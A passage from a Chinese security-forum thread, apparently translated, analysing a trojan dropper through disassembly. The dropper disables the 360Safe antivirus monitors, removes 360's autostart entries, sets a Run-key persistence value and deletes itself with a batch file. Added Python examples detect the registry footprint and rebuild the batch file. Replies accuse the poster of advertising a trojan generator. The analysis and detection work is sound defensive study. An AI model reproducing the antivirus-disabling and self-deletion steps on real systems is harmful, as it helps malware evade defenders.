00401774 68 A2214000 push 乐意梦幻.004021A2 ; ASCII "NoNotiLeak"
00401779 FF75 FC push dword ptr ss:[ebp-4]
0040177C E8 D3020000 call <jmp.&ADVAPI32.RegSetValueExA>
00401781 6A 04 push 4
00401783 8D45 F8 lea eax,dword ptr ss:[ebp-8]
00401786 50 push eax
00401787 6A 04 push 4
00401789 6A 00 push 0
0040178B 68 AD214000 push 乐意梦幻.004021AD ; ASCII "NoNotiNews"
00401790 FF75 FC push dword ptr ss:[ebp-4]
00401793 E8 BC020000 call <jmp.&ADVAPI32.RegSetValueExA>
00401798 6A 04 push 4
0040179A 8D45 F8 lea eax,dword ptr ss:[ebp-8]
0040179D 50 push eax
0040179E 6A 04 push 4
004017A0 6A 00 push 0
004017A2 68 B8214000 push 乐意梦幻.004021B8 ; ASCII "SiteAccess"
004017A7 FF75 FC push dword ptr ss:[ebp-4]
004017AA E8 A5020000 call <jmp.&ADVAPI32.RegSetValueExA>
004017AF 6A 04 push 4
004017B1 8D45 F8 lea eax,dword ptr ss:[ebp-8]
004017B4 50 push eax
004017B5 6A 04 push 4
004017B7 6A 00 push 0
004017B9 68 C3214000 push 乐意梦幻.004021C3 ; ASCII "UDiskAccess"
004017BE FF75 FC push dword ptr ss:[ebp-4]
004017C1 E8 8E020000 call <jmp.&ADVAPI32.RegSetValueExA>
004017C6 6A 04 push 4
004017C8 8D45 F8 lea eax,dword ptr ss:[ebp-8]
004017CB 50 push eax
004017CC 6A 04 push 4
004017CE 6A 00 push 0
004017D0 68 CF214000 push 乐意梦幻.004021CF ; ASCII "weeken"
004017D5 FF75 FC push dword ptr ss:[ebp-4]
004017D8 E8 77020000 call <jmp.&ADVAPI32.RegSetValueExA> ; ten safemon switches forced to 0: 360's realtime monitors are off
004017DD FF75 FC push dword ptr ss:[ebp-4]
004017E0 E8 5D020000 call <jmp.&ADVAPI32.RegCloseKey>
004017E5 8D45 FC lea eax,dword ptr ss:[ebp-4]
004017E8 50 push eax
004017E9 68 3F000F00 push 0F003F ; KEY_ALL_ACCESS
004017EE 6A 00 push 0
004017F0 68 EA204000 push 乐意梦幻.004020EA ; ASCII "Software\Microsoft\Windows\CurrentVersion\Run"
004017F5 68 02000080 push 80000002 ; HKEY_LOCAL_MACHINE
004017FA E8 4F020000 call <jmp.&ADVAPI32.RegOpenKeyExA>
004017FF 0BC0 or eax,eax
00401801 75 22 jnz short 乐意梦幻.00401825
00401803 68 D6214000 push 乐意梦幻.004021D6 ; ASCII "360Safetray"
00401808 FF75 FC push dword ptr ss:[ebp-4]
0040180B E8 38020000 call <jmp.&ADVAPI32.RegDeleteValueA> ; remove 360's own autostart entries
00401810 68 E2214000 push 乐意梦幻.004021E2 ; ASCII "360Safebox"
00401815 FF75 FC push dword ptr ss:[ebp-4]
00401818 E8 2B020000 call <jmp.&ADVAPI32.RegDeleteValueA>
0040181D FF75 FC push dword ptr ss:[ebp-4]
00401820 E8 1D020000 call <jmp.&ADVAPI32.RegCloseKey>
00401825 C9 leave
00401826 C3 retn
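A detection check that follows directly from the two registry routines above, as an added example that is not part of the original post: a small scanner over a .reg export that reports the Run value pointing at System.exe, the zeroed 360Safe safemon switches, and the missing 360Safetray/360Safebox entries. The key paths and value names are the ones from the listing; the sample exports are constructed, and the "at least half the switches zeroed" threshold in scan() is this example's own choice.

```python
"""Scan a registry export (.reg text) for the footprint the 乐意 dropper leaves.

Added example, not code from the original post. Indicators are taken from the
listing above: HKLM\...\Run "HBService32" = "System.exe", the ten
HKLM\Software\360Safe\safemon DWORDs forced to 0, and the 360Safetray /
360Safebox Run entries deleted. Both .reg samples below are constructed.
"""
import re
from collections import defaultdict

RUN_KEY = r"HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run"
SAFEMON_KEY = r"HKEY_LOCAL_MACHINE\Software\360Safe\safemon"
SAFEMON_SWITCHES = ("ARPAccess", "ExecAccess", "IEProtAccess", "LeakShowed",
                    "MonAccess", "NoNotiLeak", "NoNotiNews", "SiteAccess",
                    "UDiskAccess", "weeken")
KEY_RE = re.compile(r"^\[(.+)\]$")
VALUE_RE = re.compile(r'^"([^"]+)"=(?:"(.*)"|dword:([0-9A-Fa-f]{8}))$')


def parse_reg(text):
    """Minimal .reg parser: {key (lower-cased): {value name: str | int}}.
    Only REG_SZ and REG_DWORD lines are understood; other lines are ignored."""
    hive = defaultdict(dict)
    key = None
    for raw in text.splitlines():
        line = raw.strip()
        m = KEY_RE.match(line)
        if m:
            key = m.group(1).lower()
            hive[key]                       # register the key even if it has no values
            continue
        m = VALUE_RE.match(line)
        if m and key is not None:
            name, s, d = m.groups()
            hive[key][name] = s if d is None else int(d, 16)
    return hive


def scan(hive):
    """Return a list of human-readable findings (empty = nothing matched)."""
    findings = []
    run = hive.get(RUN_KEY.lower(), {})
    for name, data in run.items():
        if isinstance(data, str) and data.lower().endswith("system.exe"):
            findings.append("Run value %r starts %r" % (name, data))
    safemon = hive.get(SAFEMON_KEY.lower())
    if safemon is not None:                 # 360Safe is installed on this host
        zeroed = [v for v in SAFEMON_SWITCHES if safemon.get(v) == 0]
        if len(zeroed) >= len(SAFEMON_SWITCHES) // 2:
            findings.append("360Safe safemon switches zeroed: " + ", ".join(zeroed))
        if "360Safetray" not in run and "360Safebox" not in run:
            findings.append("360Safe installed but its Run entries 360Safetray/360Safebox are missing")
    return findings


def scan_reg_text(text):
    return scan(parse_reg(text))


# Constructed export from an infected host.
SAMPLE_REG = r"""Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run]
"ctfmon.exe"="C:\\WINDOWS\\system32\\ctfmon.exe"
"HBService32"="System.exe"

[HKEY_LOCAL_MACHINE\Software\360Safe\safemon]
"ARPAccess"=dword:00000000
"ExecAccess"=dword:00000000
"IEProtAccess"=dword:00000000
"LeakShowed"=dword:00000000
"MonAccess"=dword:00000000
"NoNotiLeak"=dword:00000000
"NoNotiNews"=dword:00000000
"SiteAccess"=dword:00000000
"UDiskAccess"=dword:00000000
"weeken"=dword:00000000
"""

# Constructed export from a clean host with 360Safe; the paths are made up.
CLEAN_REG = r"""[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run]
"360Safetray"="C:\\Program Files\\360safe\\safemon\\360Tray.exe"
"360Safebox"="C:\\Program Files\\360safe\\safemon\\360safebox.exe"

[HKEY_LOCAL_MACHINE\Software\360Safe\safemon]
"MonAccess"=dword:00000001
"ExecAccess"=dword:00000001
"""

if __name__ == "__main__":
    for label, text in (("infected", SAMPLE_REG), ("clean", CLEAN_REG)):
        print(label, scan_reg_text(text) or "no findings")
```

Run it against `reg export HKLM\Software out.reg` output from a suspect machine. The Run check matches on the value data rather than the name HBService32, because a generator can rename the value trivially while the dropped file is still System.exe; the safemon check is only raised when the key exists, so machines without 360Safe produce no false positive from it.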
============================================================
00401278 6A 00 push 0 ; back in the main routine: the dropper exits and leaves SelfDel.bat to remove it
0040127A E8 09070000 call <jmp.&KERNEL32.ExitProcess>
0040127F C9 leave
00401280 C3 retn
The trojan's autostart is trivial: a value under Software\Microsoft\Windows\CurrentVersion\Run (HBService32 = "System.exe", with no path, so it relies on System.exe sitting in the system directory), which is very easy to spot.
Self-deletion is done with a batch file (SelfDel.bat). This is the same lstrcatA chain at 004015C9-0040161E shown above (the sample here is the 大话2 variant, module 大话2__3). Assembled from the string fragments at 00401485-004014C5, the file the trojan writes to the temp directory is:
:Repeat
del "<full path of the dropper exe>"
if exist "<full path of the dropper exe>" goto Repeat
rmdir "<directory of the dropper exe>"
del "<temp directory>\SelfDel.bat"
The loop spins until the dropper's image is no longer locked, removes the exe, tries to remove its directory (which only works if the directory is otherwise empty), and finally deletes the batch file itself.
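The batch file can be regenerated from the bytes in the listing. As an added example that is not part of the original post, the script below transcribes the string table at 0040147E-004014C8, splits it on NUL so that the addresses used by the lstrcatA calls index it, mirrors the last-backslash truncation loop at 00401581-00401593, and replays the concatenation order at 00401597-00401626. The two paths at the bottom are constructed sample input.

```python
"""Rebuild SelfDel.bat exactly as the routine at 00401476 assembles it.

Added example, not code from the original post. INLINE_DATA is the byte run at
0040147E-004014C8 transcribed from the listing (OllyDbg showed it as
instructions; it is a NUL-separated string table). The sample paths are made up.
"""

INLINE_DATA_BASE = 0x0040147E
INLINE_DATA = bytes.fromhex(
    "6F70656E00"                          # 0040147E "open"
    "5C00"                                # 00401483 "\"
    "3A5265706561740D0A00"                # 00401485 ":Repeat\r\n"
    "64656C202200"                        # 0040148F 'del "'
    "2200"                                # 00401495 '"'
    "0D0A6966206578697374202200"          # 00401497 '\r\nif exist "'
    "2220676F746F205265706561740D0A00"    # 004014A4 '" goto Repeat\r\n'
    "726D646972202200"                    # 004014B4 'rmdir "'
    "220D0A64656C202200"                  # 004014BC '"\r\ndel "'
    "220D0A00"                            # 004014C5 '"\r\n'
)


def string_table(blob: bytes, base: int) -> dict:
    """Split a run of NUL-terminated strings into {address: str}."""
    table, start = {}, 0
    while start < len(blob):
        end = blob.index(b"\x00", start)
        table[base + start] = blob[start:end].decode("latin-1")
        start = end + 1
    return table


STRINGS = string_table(INLINE_DATA, INLINE_DATA_BASE)


def truncate_after_last_backslash(path: str) -> str:
    """Mirror of the loop at 00401581-00401593: ecx follows the last '\\' seen,
    then a NUL is stored at [ecx+1]. With no backslash at all ecx never moves,
    so only the first character survives."""
    last = path.rfind("\\")
    return path[: last + 1] if last >= 0 else path[:1]


def build_selfdel(exe_path: str, bat_path: str) -> str:
    """Replay the lstrcatA chain at 00401597-00401626 using the same
    string-table addresses the code pushes."""
    t = STRINGS
    return (t[0x401485]                                       # :Repeat\r\n
            + t[0x40148F] + exe_path + t[0x401495]            # del "<exe>"
            + t[0x401497] + exe_path + t[0x4014A4]            # \r\nif exist "<exe>" goto Repeat\r\n
            + t[0x4014B4] + truncate_after_last_backslash(exe_path)  # rmdir "<dir>
            + t[0x4014BC] + bat_path + t[0x4014C5])           # "\r\ndel "<bat>"\r\n


SAMPLE_EXE = r"C:\Downloads\setup.exe"          # constructed
SAMPLE_BAT = r"C:\WINDOWS\Temp\SelfDel.bat"     # constructed

if __name__ == "__main__":
    print(build_selfdel(SAMPLE_EXE, SAMPLE_BAT), end="")
```

Running it prints the batch text for the sample paths. Two details worth knowing when you meet this on a host: the `goto Repeat` loop busy-waits (a cmd.exe pinning a core) until the dropper's image is unlocked, and `rmdir` only succeeds on an empty directory, which is why the dropper's folder usually survives and only the exe and the .bat disappear.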
Because this trojan is extremely harmful, I will not release the program or its source, to keep it from being used for illegal purposes.

Supporting more virus-analysis articles.

From a virus-analysis standpoint, though, the analysis is not detailed enough: it only covers the autostart and the self-deletion, and says nothing about how the trojan actually operates. Looking forward to a more detailed analysis.

Can this be read as an advertisement?

Heh.

Why it is easy to call this an ad:
the analysis is only a rough outline, with no explanation of the algorithm part;
the screenshots are just of the generator;
look closely at the timestamp on the generator.
I still think calling it an ad is fair.

[ This post was last edited by iovejieba on 2009-1-10 15:07 ]

Wow, something this strong and the poster above calls it an ad...

Well, I must be slow, I read it as an ad too. What does the 2009.1.10 in the generator's title bar tell you?

Damn it. The 2009.1.10 in the generator's title bar means I posted this today, and that I compiled the source today. If that counts as advertising, then hell, I have nothing to say. As for those saying I did not explain the algorithm in detail: my skills are not good enough to explain the algorithm. If my pictures bother you, ask an admin to delete them; if you think this is a junk post, you can report it to the admins. Everyone has their own yardstick; let people measure for themselves!

Post a few screenshots of the trojan generator, then stamp your own QQ number on them.
The post says: "Because this trojan is extremely harmful, to keep it from being used for illegal purposes, I will not release the program or its source."
You know it is extremely harmful, yet you stamped a customer-service QQ on it. Is that QQ for selling the trojan? Giving it away? Or for telling people "I have a trojan but I'm not releasing it"?
You found the URL of someone else's trojan, wrote a generator, stamped your own QQ on it and put it up for sale. Can I read it that way? :D

Welcome to the OP's technical exchange on virus analysis; it would be best to analyse in a bit more detail~
As for the pictures the OP posted, they have nothing to do with the analysis in the article and could easily be mistaken for an ad, so I have deleted them....

Just talking about the matter itself,
no other intent. Since you can write a generator, you already know the algorithm, so why not publish it?
Heh, no other intent, just my own amusement.
If I have offended, sorry in advance.

Originally posted by iovejieba on 2009-1-10 20:12:
Just talking about the matter itself,
no other intent. Since you can write a generator, you already know the algorithm, so why not publish it?
Heh, no other intent, just my own amusement.
If I have offended, sorry in advance.

No offence taken. The article the OP wrote really does not match its title... it is only a quick analysis~~ And... making a generator, never mind that, it is not as if you are trying to make a trojan? If it were an algorithm analysis, that would be pretty good~